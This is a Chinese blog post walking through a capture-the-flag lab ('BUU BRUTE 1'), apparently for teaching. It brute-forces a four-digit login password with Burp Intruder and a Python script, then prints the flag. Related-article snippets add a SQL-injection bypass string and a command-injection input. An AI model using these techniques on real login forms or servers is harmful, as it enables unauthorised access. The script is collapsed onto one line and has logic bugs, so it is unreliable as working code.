BUU BRUTE 1

2024-01-24 07:04
文章标签 buu brute

本文主要是介绍BUU BRUTE 1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

靶场教程

1.开局页面,是个登录界面。
image.png
2.尝试万能密码,发现并不可行,提示【用户名错误】。用户名输入admin,发现提示密码错误,为四位数字。
image.png
3.那么,抓包爆破吧。通过burp进行抓包。
image.png
4.发送包到 Intruder 进行爆破。快捷键 Ctrl + L
image.png
3.设置爆破数值,进行爆破。在 3 处修改爆破数值0,9999,1即可。【注:已知爆破密码6490,可自定义缩小爆破范围测试】
image.png
4.开始爆破,发现结果。【密码:6490】
image.png
5.获得flag

账号:admin
密码:6490
flag{b3e478ac-0cc9-4674-b309-3beffb36009a}

image.png

方案二

1.通过 python 脚本,获取密码。

import time
import requestsurl="http://f6e13443-89ab-43b2-b355-7efe8190c675.node5.buuoj.cn:81/?username=admin&password="for i in range(6400, 7000):res = requests.get(url + str(i))print("[*] Try :" + str(i))if "429" in res.status_code:time.sleep(0.5)i = i-1continueif res.text != "密码错误,为四位数字。":print(res.text)break

2.获取 flag

账号:admin
密码:6490
flag{b3e478ac-0cc9-4674-b309-3beffb36009a}

这篇关于BUU BRUTE 1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/638872

相关文章

hdu 3315 My Brute 网络流

Description Seaco is a beautiful girl and likes play a game called “My Brute”. Before Valentine’s Day, starvae and xingxing ask seaco if she wants to spend the Valentine’s Day with them, but sea

BUU CODE REVIEW 11 代码审计之反序列化知识

打开靶场,得到的是一段代码。 通过分析上面代码可以构造下面代码,获取到序列化之后的obj。 <?phpclass BUU {public $correct = "";public $input = "";public function __destruct() {try {$this->correct = base64_encode(uniqid());if($this->corre

DVWA - Brute Force

DVWA - Brute Force 等级:low ​ 直接上bp弱口令爆破,设置变量,攻击类型最后一个,payload为用户名、密码简单列表 ​ 直接run,长度排序下,不一样的就是正确的用户名和密码 ​ 另解: 看一下源码,user变量直接被嵌入sql语句中,没有进行任何过滤,故可以用万能密码(' or 1=1#​)截断sql语句,使result值为1,绕过登陆验证 ​ ​

String Matching -- Brute Force + Rabin-Karp + KMP

String Matching 这个问题已经被做烂了... 下面是C语言实现集合. http://www-igm.univ-mlv.fr/~lecroq/string/ 留个爪~ 暴力解法:       暴力美啊~ """Programmer : EOFDate : 2015.02.28Cod

buu逆向-刮开有奖

首先查壳 拖到ida找到主函数 进入DialogFunc函数得到 INT_PTR __stdcall DialogFunc(HWND hDlg, UINT a2, WPARAM a3, LPARAM a4){const char *v4; // esiconst char *v5; // ediint v7[2]; // [esp+8h] [ebp-20030h] BYREFint v8;

自己测到的Buu IP

www.buu.edu.cn 210.82.53.210[北京市 北京联合大学] http://it.buu.edu.cn 210.82.53.210[北京市 北京联合大学] graduate.buu.edu.cn 210.82.53.210[北京市 北京联合大学] www.lib.buu.edu.cn 210.82.53.210[北京市 北京联合大学] jd.bu

BUU-黑客帝国

题目 解题 打开txt文件后,发现很长的一段文字, 开头为52617221,猜测这是个rar文件。利用脚本将这些数据以二进制流流形式写入rar文件 import binasciiwith open('文件名', 'r') as fr:hex_data = fr.read()with open('res.rar', 'wb') as fw:fw.write(binascii.unhex

BUU-[GXYCTF2019]Ping Ping Ping

考察点 命令执行 题目 解题 简单测试 ?ip应该是一个提示,那么就测试一下?ip=127.0.0.1 http://0c02a46a-5ac2-45f5-99da-3d1b0b951307.node4.buuoj.cn:81/?ip=127.0.0.1 发现正常回显 列出文件 那么猜测一下可能会有命令执行漏洞,测试?ip=127.0.0.1;ls http://0

buu相册

010分析是一个rar文件,7z打开发现是一个apk文件 但没发现什么敏感信息 全局搜索mail 然后就是查看引用与出处 base解密完是一个邮箱,提交对了。

BUU [CSAWQual 2016]i_got_id

题目打开有三个选项,依次点进去看。 第一个是普通页面,第二个是普通表单,第三个是文件上传。没有尝试注入(不爱做注入),直觉感觉是文件上传,就从这里入手吧。 先随便传几个文件测试下功能,发现没做什么过滤,并且返还了文件内容 初步推测用到了param()函数,然后大概推测一下后端代码 my $cgi= CGI->new;if ( $cgi->upload( 'file' ) ){my $f